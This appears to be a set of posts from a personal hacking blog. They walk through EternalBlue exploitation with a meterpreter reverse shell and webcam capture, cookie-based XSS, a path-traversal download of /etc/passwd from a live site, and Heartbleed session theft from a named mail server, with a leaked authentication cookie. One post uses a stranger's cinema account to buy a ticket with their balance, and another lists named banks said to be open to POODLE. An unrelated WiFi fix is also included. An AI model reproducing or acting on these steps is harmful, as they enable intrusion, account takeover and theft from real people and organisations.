Just wanna share it..

I'm using this msf module https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy paste eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.

Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).

Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use Eternalblue-Doublepulsar-Metasploit/deps/ directory. For example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget set the PAYLOAD windows/x64/meterpreter/reverse_tcp (my target use x64 so i'm using x64 payload too).


If everything sets, now run exploit.

Run some interesting command like webcam_list or webcam_snap


The victim desktop screenshot.


Tested on my local network, tool used Metasploit running in Kali Linux.
Thats it, happy hacking!

This vulnerability counts as medium risk. All you need is install Cookies Manager+ addon in firefox or any other addon/plugin that use to manipulate cookie.

Browse the page as usual.

Open Cookies Manager+ and search for vulnerable cookie parameter, in this case is C_UL parameter. Double click on it and change the content with XSS payload and Save it.

Back to the browser, refresh the page and you will see the pop-up.

Thats it! This kind of vulnerability worth 50-100 usd in bug bounty program. Happy hunting! :)

While browsing i found this cool remote file download vulnerability. :)


If i open link above, it will download a file for me. Now see the path and file parameter. It's base64 encrypt.


Decrypt both value and i got this.


Now i know the path and the file name. What if i change it? Let see.


I changed the path value with /etc/ and file value with passwd. Encrypt it to base64 first.


This modified link will download passwd file from the system.

Thats it.. :)

*some link and value in this PoC has been cencored/changed coz this is a live website.
*admin is notified by email

Well this is an old vulnerablity called Heartbleed (CVE-2014-0160). Let's exploit this.

Run the Heartbleed exploit and you'll get the Zimbra cookie.

See the Referer and Cookie? Use that to login.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site in firefox who have installed Cookie Injector plugin https://mx.tempo.co.id/ and press alt+c to show the Cookie Injector.

You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should have popup screen "All Cookie Have Been Written".

Refresh (F5) the site again and you are now login to user email.

Type password on search box and hit enter... :p


Hi, it's been a while since my last post.. :)

21 Cineplex is one of the largest group of cinema in Indonesia (Cinema 21, Cinema XXI and The Premiere). In this post i wanna show you guys how i buy ticket using other people account on 21 Cineplex website. Well this is an old vulnerability but they never fix it so let's have some fun. :p

Start with find user cookies and referer link.

I will use this cookies and referer link. Open the referer link in browser.

As we can see on the left side, i don't have access to this account. Now use the user cookies.
I'm using Cookie Injector to write cookies.

Copy and paste user cookies to Cookie Injector than click OK and we'll have this screen below. This means user cookies is written successfully.

Now reopen the referer link. I will automatically login to the user page.

Let's buy a ticket with this account. The account balance is Rp. 165.000.
I wanna watch Inferno :)

Select city, cinema, date, time and how many ticket that we want to buy. Click CONTINUE, select seat and click BUY NOW.

Transaction process.

And i have my free ticket.. :)
I also have the transaction code 11636 to pick up the ticket.

As we can see now the user balance is Rp. 104.000.

Thats it for today. I have movie to watch. :p

Stay safe! Stay cool! :)


Hi all..

I'm using HP ProBook with Kubuntu 14.04 but my WiFi keep dropping connection.
I have to reboot laptop to connect WiFi again.

I use this command to fix my WiFi problem and it's working fine.

echo "options rtl8723be fwlps=N ips=N" | sudo tee /etc/modprobe.d/rtl8723be.conf
Anyway my chipset is Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter.

This setting can be different depens on your chipset.
To see your chipset, you can use this command.


I hope this can usefull for you to!


Here is some Indonesian Bank that still vulnerable to Poodle attack.
I'm using SSL/TLS Security Test by High-Tech Bridge and manual scan using nmap.

>> https://iperson.bankjatim.co.id

SSL/TLS Security Test

Script scan nmap

>> https://netbank.jtrustbank.co.id

SSL/TLS Security Test

Script scan nmap

>> https://cib.qnb.co.id

SSL/TLS Security Test

Script scan nmap

>> https://www.tunaiku.amarbank.co.id

SSL/TLS Security Test

Script scan nmap

>> https://www.nobuwwwbanking.com

SSL/TLS Security Test

Script scan nmap

Happy hunting guys!

Some bank has been notified about this vulnerability.